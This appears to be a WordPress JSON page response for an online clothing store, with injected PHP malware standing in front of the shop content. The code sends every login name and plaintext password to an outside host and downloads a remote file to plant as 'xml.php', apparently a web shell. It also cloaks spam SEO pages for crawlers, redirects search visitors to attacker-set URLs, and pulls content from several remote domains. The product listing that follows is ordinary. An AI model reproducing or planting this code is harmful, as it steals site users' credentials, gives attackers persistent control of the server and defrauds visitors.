if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?>{"id":2,"date":"2020-11-10T07:37:19","date_gmt":"2020-11-10T07:37:19","guid":{"rendered":"https:\/\/pulkash.com\/?page_id=2"},"modified":"2022-04-29T15:10:11","modified_gmt":"2022-04-29T15:10:11","slug":"home","status":"publish","type":"page","link":"https:\/\/pulkash.com\/","title":{"rendered":"Home"},"content":{"rendered":"<p>[vc_row full_width=”stretch_row_content_no_spaces” no_padding=”yes” el_class=”mb-4 pb-2″][vc_column][vc_raw_html]JTNDdmlkZW8lMjBjbGFzcyUzRCUyMnZpZGVvJTIyJTIwbXV0ZWQlM0QlMjIlMjIlMjBwbGF5c2lubGluZSUzRCUyMiUyMiUyMHByZWxvYWQlM0QlMjJub25lJTIyJTIwYXV0b3BsYXklM0QlMjIlMjIlMjBsb29wJTNEJTIyJTIyJTIwd2lkdGglM0QlMjIxMDAlMjUlMjIlM0UlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlM0Nzb3VyY2UlMjB0eXBlJTNEJTIydmlkZW8lMkZtcDQlMjIlMjBzcmMlM0QlMjJodHRwcyUzQSUyRiUyRnB1bGthc2guY29tJTJGd3AtY29udGVudCUyRnVwbG9hZHMlMkYyMDIyJTJGMDQlMkZtYW5zaGEtb3B0LTIubXA0JTIyJTNFJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDJTJGdmlkZW8lM0U=[\/vc_raw_html][\/vc_column][\/vc_row][vc_row wrap_container=”yes” no_padding=”yes” animation_delay=”200″ el_class=”home-bar”][vc_column]<div class=\"porto-carousel owl-carousel has-ccols ccols-xl-4 ccols-lg-3 ccols-md-3 ccols-sm-2 ccols-2 mb-4 pb-2\" data-plugin-options=\"{"stagePadding":0,"margin":0,"autoplay":"yes","autoplayTimeout":4000,"autoplayHoverPause":"true","items":4,"lg":3,"md":3,"sm":2,"xs":2,"nav":false,"dots":false,"animateIn":"","animateOut":"","loop":"yes","center":false,"video":false,"lazyLoad":false,"fullscreen":false}\">[vc_single_image image=”765″ img_size=”full” alignment=”center”][vc_single_image image=”768″ img_size=”full” alignment=”center”][vc_single_image image=”766″ img_size=”full” alignment=”center”][vc_single_image image=”767″ img_size=”full” alignment=”center”]<\/div>[\/vc_column][\/vc_row][vc_row][vc_column width=”1\/2″][vc_single_image image=”943″ img_size=”full” alignment=”center” onclick=”custom_link” link=”https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/”][\/vc_column][vc_column width=”1\/2″][vc_single_image image=”944″ img_size=”full” alignment=”center” onclick=”custom_link” link=”https:\/\/pulkash.com\/product-category\/women\/stitched\/riwayat-chapter-2\/”][\/vc_column][\/vc_row][vc_row][vc_column][vc_custom_heading text=”Trending Products” font_container=”tag:h1|font_size:2rem|text_align:center|line_height:1.2″ use_theme_fonts=”yes” font_weight=”600″ letter_spacing=”-.01em” el_class=”mb-4″]<div id=\"porto-products-4396\" class=\"porto-products wpb_content_element top-ten-products mb-5 swiper-wrapper\"><div class=\"woocommerce columns-4 \"><ul class=\"products products-container grid show-nav-middle pcols-lg-4 pcols-md-3 pcols-xs-3 pcols-ls-2 pwidth-lg-4 pwidth-md-3 pwidth-xs-2 pwidth-ls-1 is-shortcode\"\n\t data-cur_page=\"1\" data-max_page=\"1\" data-product_layout=\"product-outimage_aq_onimage\">\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-562 status-publish first instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1b-1-700x1050-1-600x900_1_11zon.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1b-1-700x1050-1-600x900_1_11zon.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/1b-1-700x1050-1-600x900_1_11zon-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"562\" data-product_sku=\"MAN-CH1-01\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"562\" data-product_variations=\"[{"attributes":{"attribute_pa_size":"large"},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"1a-1-700x1050-34.99-600x900_2_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":951,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":10,"min_qty":1,"price_html":"","sku":"MAN-CH1-01","variation_description":"","variation_id":564,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/1a-1-700x1050-34.99-600x900_2_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/